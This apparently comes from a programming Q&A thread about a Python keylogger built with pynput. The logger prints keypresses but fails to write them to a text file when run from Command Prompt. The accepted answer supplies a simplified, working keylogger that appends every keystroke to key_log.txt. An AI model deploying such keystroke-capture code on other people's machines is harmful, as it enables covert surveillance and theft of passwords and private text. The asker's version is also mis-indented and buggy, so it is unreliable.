# Running Python files partially working in Command Prompt?

Tags: python, command-prompt

I'm trying to run a key logger program in command prompt

All of the print functions are working fine but it won't actually store them in my `txt` file.

The thing that's really confusing me though is that it works perfectly fine whenever I run it in my IDE, Pycharm.

Here's my code:

```
 from pynput.keyboard import Key, Listener

 count = 1
 keys = []

def on_press(key):
     global keys, count

if key != "Key.shift pressed":
    keys.append(key)
    count += 1
    print("{0} pressed".format(key))

if count >= 1:
    count = 0
    write_file(keys)
    keys = []

 def write_file(keys):
     with open("key_log.txt", "a") as f:
         for key in keys:
             k = str(keys).replace("'", "")
             if k.find("space") > 0:
                 f.write('\n')
             elif k.find("Key") == -1:
                 f.write(k)
 def on_release(key):
     if key==Key.esc:
         return False



 with Listener(on_press=on_press, on_release=on_release) as listener:
     listener.join()
```

Comment: Check if you have the permission to create and write to a file

Answer (score 1, accepted):

Your concept is right, but you don't need to be collecting all your keypresses into a list. Also, you're iterating through your list, and then treating your list as one big string. So, you don't need to be doing any of that.

I recommend simplifying your code into something more like this:

```
from pynput.keyboard import Key, Listener
import sys

def on_press(key):
    print("{0} pressed".format(key))
    write_file(key)

def write_file(key):
    with open("key_log.txt", "a") as f:
        if hasattr(key, "char"):
            f.write('{0}'.format(key.char))
        elif key == Key.enter:
            f.write("\n")
        elif key == Key.space:
            f.write(" ")

with Listener(on_press=on_press, on_release=None) as listener:
    try:
        listener.join()
    except:
        with open("key_log.txt", "a") as f:
            f.write("\n")
        sys.exit()
```

In my version of your code, you log the key pressed in your python console and then pass the key into the write_file function. From there, the function opens the key_log.txt file and checks to see whether to write anything into the file. If so, the character is written, and if not, the file will be closed.

If you want to halt the process, type ctrl + C to throw a KeyboardInterrupt to stop the process.